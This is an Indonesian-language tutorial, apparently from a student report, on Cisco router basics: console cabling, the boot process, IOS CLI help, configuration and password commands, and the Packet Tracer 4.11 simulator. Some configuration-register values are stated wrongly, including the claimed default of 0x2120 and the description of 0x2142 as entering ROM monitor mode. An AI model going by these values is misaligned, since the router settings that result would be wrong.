Untuk menghubungkan Router Cisco ke suatu terminal atau komputer, diperlukan kabel rollover dan adaptor RJ-45 ke DB-9 yang biasanya disertakan dengan peralatan router tersebut. Cara memerikasa apakah suatu kabel berjenis rollover sangat mudah. Jalur kabel yang menghubungkan antara pin nomor 1 dengan pin 8 dari konektor RJ-45 lainnya harus sama warnanya. Kabel rollover biasanya dibuat dari kabel pita (ribbon cable) 8 jalur. Kabel rollover ini dihubungkan dari console port router ke Serial port COM 1 atau COM 2 komputer. Bergantung pada Serial port, jika panel belakang komputer menggunakan konektor DB-25 atau DB-9, maka diperlukan adapter RJ-45 ke DB-9 atau DB-25 yang sesuai. Setelah itu, Router Cisco dan komputer yang saling terhubung bisa dihidupkan. Hyperterminal digunakan sebagai program untuk menghubungkan Router Cisco dengan komputer.

3. Booting Router Cisco

Layaknya komputer, setiap kali cisco router dihidupkan, peralatan ini akan menjalankan suatu proses yang disebut boot process. Proses boot ini bekerja melalui urutan-urutan tertentu sebagai berikut :

a. Pertama-tama router akan menjalankan Power On Self Test (POST) untuk memeriksa CPU, memori, dan interface peralatan untuk meyakinkan bahwa perangkat keras router berfungsi dengan baik. Jika hubungan dengan hyperterminal telah terjadi, proses boot ini dapat dilihat pada layar komputer.

b. Kemudian boostrap system akan bekerja untuk mencari Cisco IOS image yang dapat dipakai. Umumnya Cisco IOS image ini dapat diperoleh dari memori FLASH atau dari TFTP server bergantung pada daftar konfigurasi (configuration register) yang dapat dipakai oleh peralatan. Secara default daftar konfigurasi ini bernilai 0×2120 yang akan memerintahkan router untuk mencari IOS image dari memori FLASH. Usaha pencarian IOS ini dilakukan sebanyak lima kali. Jika tidak berhasil, router akan masuk ROM mode untuk memungkinkan pemilihan IOS image secara manual.

c. Jika IOS image ditemukan, IOS image tersebut akan dimuat ke dalam sistem memori RAM. Kemudian router akan mencari konfigurasi awal (start-up configuration) yang umumnya disimpan di NVRAM. Jika router baru pertama kali dihidupkan, router tersebut biasanya belum mempunyai kon-

figurasi awal. Oleh karena itu, router akan menjalankan System Configuration Dialog yang memungkinkan pembuatan konfigurasi awal secara manual.

4. Penggunaan Router Cisco

a. Cisco IOS

Suatu komputer tentu memerlukan system operasi seperti Disk Operating System (DOS) atau UNIX untuk mengatur kerja dan konfigurasi komputer tersebut. Demikian pula halnya dengan Router Cisco, perangkat ini dilengkapi pula dengan Cisco IOS (Internetwork Operating System), yaitu suatu system operasi yang berfungsi untuk mengatur dan mengkonfigurasi Router Cisco. Seperti sistem operasi DOS atau UNIX untuk komputer, Cisco IOS menggunakan perintah baris (command line) untuk menjalankan suatu perintah. Seperti DOS atau UNIX, Cisco IOS dikeluarkan dengan berbagai macam versi untuk berbagai macam peralatan buatan Cisco. Berbagai versi yang dikeluarkan itu juga dimaksudkan untuk menyempurnakan kegunaannya dari waktu ke waktu. Oleh sebab itu dalam menggunakan Router Cisco, perlu diperhatikan versi IOS yang akan dipakai. Perintah-perintah yang berfungsi dalam suatu versi untuk suatu peralatan atau model mungkin tidak dapat digunakan pada suatu peralatan atau model lainnya. Demikian pula perintah-perintah yang berfungsi dalam suatu versi baru mungkin tidak berfungsi dalam versi lama.

b. Cara Membuat Konfigurasi Awal

Konfigurasi awal (start-up configuration) adalah suatu file yang berguna untuk menentukan bagaimana Router Cisco diatur pada saat boot. Jadi boleh dkatakan file konfigurasi awal ini mirip seperti file autoexec.bat pada DOS yang berguna untuk mengatur suatu komputer pada saat boot. Umumnya ketika pertama kali router dihidupkan, router tersebut belum mempunyai konfigurasi awal.

Untuk membuat konfigurasi awal, Cisco router dilengkapi dengan tiga cara sebagai berikut :

1) Dengan suatu system configuration dialog, yang secara otomatis dijalankan jika router tidak menemukan konfigurasi awal pada saat dihidupkan, dan hubungan ke jaringan WAN belum ada.

2) Dengan Autoinstall, dimana router mendapatkan konfigurasi awal dari TCP/IP host yang sudah berfungsi di suatu jaringan WAN.

3) Dari configuration mode, dengan menggunakan perintah-perintah command-line interface (CLI) system configuration dialog secara otomatis akan membantu dalam membuat konfigurasi awal bagi peralatan router yang belum memiliki konfigurasi awal sewaktu router dihidupkan. Jika ingin menggunakan system configuration dialog hubungan kabel ke jaringanWAN harus dilepaskan dulu sebelum peralatan router dihidupkan, sampai konfigrasi awal selesai dibuat.

Jika hubungan ke jaringan WAN tersedia, router akan menjalankan autoinstall. Setelah system konfiguration dialog muncul di layar, kemudian mengisi pertanyaan yang diberikan sesuai dengan kebutuhan. Misalnya : nama router, password, banner, IP Address dan sebagainya.

c. Perintah-Perintah Router Cisco

Router Cisco mendukung auto complete artinya kita diperbolehkan mengetik sebagian dari command-command yang tersedia. seperti

Router#configure terminal

bisa ditulis dengan

Router#config t

Tanda “?” digunakan untuk mencari bantuan. Ada beberapa cara menggunakan perintah“?”. Bila perintah “?” diketik setelah tanda prompt, maka akan muncul daftar perintah-perintah yang dapat digunakan di tingkat tersebut. Jadi daftar perintah yang diberikan dari user exec prompt tidak sama dengan jika dibuat dari privileged exec prompt.

Router>?

Exec commands :

Connect open a terminal connection

Disable Turn off privileged commands

Disconnect Disconnect an existing network connection

Bila perintah “?” diketik setelah spasi dari suatu perintah yang telah diketik, command akan memberikan bantuan dengan memberikan daftar perintah atau parameter berikutnya yang perlu diketikkan untuk melengkapi perintah tersebut.

Router>Telnet ?

WORD IP Address or hostname of a remote system

Bila perintah ? diketik langsung tanpa spasi setelah suatu perintah yang diketik, ia akan melengkapi perintah tersebut.

Router>tel?

Telnet

Tab key berfungsi untuk meneruskan suatu perintah yang belum lengkap diketik, Router#tel disusul penekanan tombol akan mengembalikan router prompt dengan perintah yang telah lengkap seperti Router#Telnet

Perintah-perintah keyboard lainnya yaitu berupa shortcut, sebagai berikut :

1) Panah atas : Menampilkan perintah sebelumnya dari history buffer

2) Tab : Melengkapi suatu perintah.

3) Ctrl+A : Memindahkan cursor ke permulaan baris.

4) Ctrl+B : Memindahkan kembali posisi kursor suatu karakter.

5) Ctrl+D : Menghapus karakter dimana kursor berada.

6) Ctrl+E : Memindahkan kursor ke akhir baris.

7) Ctrl+P : Menampilkan perintah sebelumnya dari history buffer.

Ctrl+U : Menghapus karakter sampai permulaan baris.

9) Ctrl+W : Menghapus data sebelumnya.

10) Ctrl+Z : Kembali ke privileged mode.

d. Tingkat-tingkat Akses

Cisco IOS mempunyai penerjemah perintah (command interepter) yang disebut EXEC. Penerjemah perintah EXEC ini menerima perintah yang diketik oleh pemakai dan mengeksekusi perintah tersebut. Untuk menjaga keamanan konfigurasi router, EXEC dibagi atas beberapa tingkat-tingkat akses berdasar kegunaannya,antara lain user mode, privileged mode dan global configuration mode.

e. Global Configuration Mode

Pada tingkat ini, hampir semua ragam konfigurasi router dapat diolah. Cara masuk ke konfigurasi global yaitu dengan mengetikkan perintah configuration terminal atau config t dari router#prompt. Router akan memasuki konfigurasi global dengan ditandai munculnya Router(config)#prompt seperti pada contoh dibawah ini:

Router#config t

Enter configuration commands, oner per line. End with CTRL+Z

Router(config)#

Perintah-perintah pada tingkatan ini pada umumnya digunakan untuk mengubah konfigurasi router secara global.

1) Banner : untuk membuat banner setelah logon ke router

Router(config)#banner motd #Do not change anything#

Dimana motd adalah singkatan Message Of The Day (pesan hari ini) yang ingin ditampilkan jika seorang pemakai mengadakan akses ke sistem router melalui console port maupun telnet.

Router(config)#no banner motd perintah ini akan menghapus banner motd.

2) Hostname : untuk memberi atau merubah nama router

Router(config)#hostname Router1, untuk menjalankan perintah dimana nama router diganti dengan nama Router1.

3) IP host : untuk memberi nama bagi IP Address dari interface suatu router 1. Jadi nama alias ini bisa digunakan untuk menggantikan IP Address suatu interface.

Router(config)#IP host LABB201yes! 10.122.1.234, perintah ini memberi nama LABB201yes! Kepada IP Address 10.122.1.234 suatu router.

4) Boot : untuk mengatur cara boot atau memilih IOS image yang akan dipakai waktu BOOT oleh suatu router. Router dapat di boot dengan IOS yang disimpan di ROM, FLASH atau TFTP dengan perintah sebagai berikut:

Router(config)#Boot system ROM untuk boot dari ROM

Router(config)#Boot system FLASH untuk boot dari FLASH. Perintah ini akan memberikan hasil yang sama dengan perintah reload

Router(config)#Boot system tftp untuk boot lewat jaringan dengan tftp, dimana nama IOS file dan IP Address dari TFTP dibutuhkan.

Bila router tidak menemukan IOS atau proses boot diinterupsi, router masuk ke suatu mode yang disebut ROM monitor mode, yang ditandai dengan rommon>prompt.

Kemudian dapat memilih dari mana IOS akan dimulai seperti berikut ini:

Rommon>boot untuk boot dari ROM

Rommon>boot flash untuk boot dari flash memory

Rommon>boot untuk boot dari jaringan lewat TFTP.

5) Config-register adalah perintah unutk menentukan dari mana router akan memulai sistem boot secara otomatis.

Router(config)#config-register 0×2142 untuk masuk ke ROM monitor mode.

Router(config)#config-register 0×0101 untuk boot dari ROM.

Router(config)#config-register 0×2102 untuk boot dari NVRAM.

6) Copy : untuk mengkopi file atau konfigurasi RAM, NVRAM dan TFTP satu dengan yang lain. Copy juga digunakan untuk membackup suatu konfigurasi satu IOS Image.

7) Username : berguna untuk membuat account dan password baru buat pemakai.

Router(config)#username password

Sebagai contoh:

Router(config)#username b201new password kunci perintah ini akan membuat account baru bernama b201new dengan password kunci.

Password : berguna untuk membuat password untuk menjaga keamanan akses ke sistem router. Cisco IOS mempunyai 5 macam jenis password untuk akses ke sistem router.

a) Enable Secret : untuk membuat password yang dienkrIPsi untuk masuk ke privileged mode.

Router(config)#enable secret rahasia untuk membuat enable secret password bernama rahasia.

b) Enable password : untuk membuat password untuk masuk ke privileged mode jika enable secret password tidak dibuat, atau untuk Cisco IOS versi lama. Perlu diketahui pula enable secret dan enable password sebaiknya tidak mempunyai nama password yang sama.

Router(config)#enable password kunci untuk membuat enable password bernama kunci.

c) Console password: untuk membuat password untuk akses ke router lewat console.

Router(config)#line con

Router(config-line)#login

Router(config-line)#password kunci untuk membuat password bernama kunci untuk mengakses router lewat console.

d) Auxiliary password: untuk membuat password untuk akses ke router melalui lewat AUX.

Router(config)#line aux 0

Router(config-line)#login

Router(config-line)#password kunci untuk membuat password bernama kunci untuk mengakses router lewat AUX.

e) VTY password: untuk membuat password untuk akses dengan Telnet ke router.

Router(config)#line vty 0 4

Router(config-line)#login

Router(config-line)#password kunci untuk membuat password bernama kunci untuk mengakses router lewat virtual terminal.

Packet Tracer 4.11

Software Packet Tracer 4.11 merupakan software simulasi untuk jaringan. Software ini dapat mensimulasikan koneksi suatu jaringan yang dimiliki oleh suatu organisasi atau perusahaan. Dengan kata lain Software tersebut mampu menampilkan secara detail mengenai perjalanan data dari network yang satu ke network yang lain sesuai dengan konfigurasi yang telah diatur.

Saat mulai menggunakan Software Packet Tracer 4.11, akan terlihat menu-menu yang terdiri dari beberapa perintah atau komponen, antara lain :

a. Menu Bar : menu bar ini terdiri dari menu file, option dan help. Pada menu-menu tersebut terdapat perintah-perintah dasar seperti, open, save, print dan preferences dalam menu ini.

b. Main Tool Bar : Menu ini berisi shortcut icon menuju ke menu perintah file dan edit. Dalam menu ini juga terdapat tombol untuk zoom, warna untuk gambar, dan device template manager. Di sebelah kanan, juga terdapat tombol untuk infomasi mengenai jaringan, dimana tombol tersebut dapat digunakan untuk memperlihatkan penjelasan tentang jaringan yang sedang bekerja.

c. Common Tool Bar : Dalam menu ini terdapat peralatan yang digunakan merancang suatu jaringan seperti : Select, Move Layout, Place Note, Delete, Inspect, Add Simple PDU, dan Add Complex PDU.

d. Logical/Physical Workspace and Navigation Bar : Menu ini memungkinkan pengguna untuk mengatur arah dari suatu cluster, membuat clusters yang baru , menggerakkan objek, mengatur latar belakang dan memperlihatkan port yang digunakan.

e. Workspace : Area ini merupakan area untuk membuat simulasi jaringan yang diinginkan, mengamati simulasi-simulasi, dan memperlihatkan berbagai jenis informasi dan statistik.

f. Realtime/Simulation Bar : Dengan menggunakan pilihan ini pengguna dapat memilih antara mode realtime dan mode simulation.

g. Network Component Box : Dalam kotak ini terdapat peralatan dan media koneksi yang ingin digunakan untuk membuat suatu jaringan, dan tentunya dapat memindahkannya ke dalam area kerja/workspace.

Gambar 2.19

Packet Tracer 4.11

pkt

Sumber : Capture Packet Tracer 4.11

Untuk mode operasi Software ini memiliki dua buah mode operasi, yakni mode realtime dan mode simulation. Mode realtime adalah mode dimana network yang kita miliki berjalan sesuai dengan waktu yang sesungguhnya atau dihitung per detik. Dalam mode ini jaringan akan merespon tindakan yang kita berikan seperti pada peralatan yang sesungguhnya. Misalnya bila suatu jaringan sudah dibentuk dan dikonfigurasikan, pada saat kita berikan perintah ping atau show pada CLI (Command Line Interface), hasilnya akan segera ditampilkan dalam waktu yang sesungguhnya atau sesuai dengan kenyataan.

Lalu pada mode simulation, jaringan yang disimulasikan dapat kita hentikan sesuai dengan keinginan, apabila terdapat suatu kesalahan. Dalam mode ini kita dapat melihat perjalanan data dari suatu jaringan ke jaringan yang lain, langkah demi langkah. Selain itu kecepatan simulasi yang dijalankan juga dapat diatur dalam mode ini. Misalnya pada saat menguji koneksi dengan mengirimkan sebuah PDU (Packet Data Unit) kita dapat melihat perjalanan data tersebut dari pengirim menuju penerima, sampai kembali ke pengirim. Caranya adalah dengan mengklik tombol auto capture/play.

Kemudian apabila pada saat simulasi dijalankan perjalanan data tidak sesuai dengan konfigurasi atau gagal, simulasi tersebut dapat dihentikan pada saat itu juga dengan mngklik tombol delete. Dan apabila sudah dIPerbaiki dan dijalankan kembali, simulasi dapat dipercepat dengan mengklik tombol capture/forward pada menu simulation. Untuk mengkonfigurasikan device yang digunakan dapat dilakukan dengan mengklik device itu sendiri dan memilih menu config atau dengan menggunakan Command Line Inteface.